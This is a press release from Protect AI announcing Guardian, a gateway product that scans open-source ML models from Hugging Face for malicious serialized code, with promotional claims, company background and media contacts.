Protect AI Announces Guardian, A Secure Gateway To Enforce ML Model Security

Industry leading AI security platform now scans and blocks risks in widely deployed open-source models from Hugging Face and other public ML model repositories

SEATTLE--()--Protect AI, the artificial intelligence (AI) and machine learning (ML) security company, today announced Guardian, an industry-first secure gateway, which enables organizations to enforce security policies on ML Models to prevent malicious code from entering their environment. Guardian is based on ModelScan, an open-source tool from Protect AI that scans machine learning models to determine if they contain unsafe code. Guardian brings together the best of Protect AI’s open source offering, and enables enterprise level enforcement and management of model security, and extends coverage with proprietary scanning capabilities.

The growing democratization of Artificial Intelligence and Machine Learning (AI/ML) is largely driven by the accessibility of open-source 'Foundational Models' on platforms like Hugging Face. These models, downloaded millions of times monthly, are vital for powering a wide range of AI applications. However, this trend also introduces security risks, as the open exchange of files on these repositories can lead to the unintended spread of malicious software among users.

“ML models are new types of assets in an organization's infrastructure, yet they are not scanned for viruses and malicious code with the same rigor as even a PDF file before they are used,” said Ian Swanson, CEO of Protect AI. “There are thousands of models downloaded millions of times from Hugging Face on a monthly basis, and these models can contain dangerous code. Guardian enables customers to take back control over open-source model security.”

The security posture of openly shared machine learning models puts an enterprise at critical risk to a Model Serialization attack. This occurs when malware code is added to the contents of a model during serialization (saving) and before distribution - creating a modern version of the Trojan Horse. Once added to a model, this unseen malicious code can be executed to steal data and credentials, poison data, and much more. These risks are prevalent in models hosted in large repositories such as Hugging Face.

Last year, Protect AI launched ModelScan, an open-source tool to scan AI/ML models for potential attacks in order to help secure systems from supply chain attacks. Since then, Protect AI has used ModelScan to evaluate over 400,000 models hosted on Hugging Face in order to identify unsafe models, and refreshes this knowledge base, nightly. To date, over 3300 models were found to have the ability to execute rogue code. These models continue to be downloaded and deployed into ML environments, but without the security tools needed to scan models for risks, prior to adoption.

Unlike other open-source alternatives, Protect AI’s Guardian acts as a secure gateway, bridging ML development and deployment processes that use the Hugging Face and other model repositories. It uses proprietary vulnerability scanners, including a specialized scanner for Keras lambda layers, to proactively scan open-source models for malicious code, ensuring the use of secure, policy-compliant models in organizational networks. With advanced access control features and dashboards, Guardian provides security teams control over model entry and comprehensive insights into model origins, creators, and licensing. Guardian also seamlessly integrates with existing security frameworks and complements Protect AI’s Radar for extensive AIML threat surface visibility in organizations.

Guardian enhances Protect AI's leading position in AI security and MLSecOps, adding essential capabilities to our comprehensive platform. Recognized for our deep expertise in AI and ML model security, Protect AI offers unparalleled features. These enable enterprises to develop, deploy, and manage secure, compliant, and operationally efficient AI applications, by providing the ability to see, know, and manage security risks across enterprise AI environments. Protect AI is committed to leading the charge towards a safer AI-powered world and pioneering the adoption of MLSecOps practices. Contact Protect AI to learn more about Guardian and other Protect AI offerings.

About Protect AI

Protect AI is the broadest and most comprehensive platform to secure your AI. It enables you to see, know, and manage security risks to defend against unique AI security threats, and embrace MLSecOps for a safer AI-powered world. Protect AI’s Platform provides visibility into the AI/ML attack surface, detects unique security threats, and remediates vulnerabilities. Founded by AI leaders from Amazon and Oracle, Protect AI is funded by Acrew Capital, boldstart ventures, Evolution Equity Partners, Knollwood Capital, Pelion Ventures and Salesforce Ventures. The company is headquartered in Seattle, Washington.

For more information visit us on the web, and follow us on LinkedIn and X/Twitter.

Contacts

Media:
Marc Gendron
Marc Gendron PR for Protect AI
marc@mgpr.net
617-877-7480

Release Summary

ML models are new types of assets, yet they are not scanned for viruses and malicious code with the same rigor as even a PDF file before they are used

Social Media Profiles

Contacts

Media:
Marc Gendron
Marc Gendron PR for Protect AI
marc@mgpr.net
617-877-7480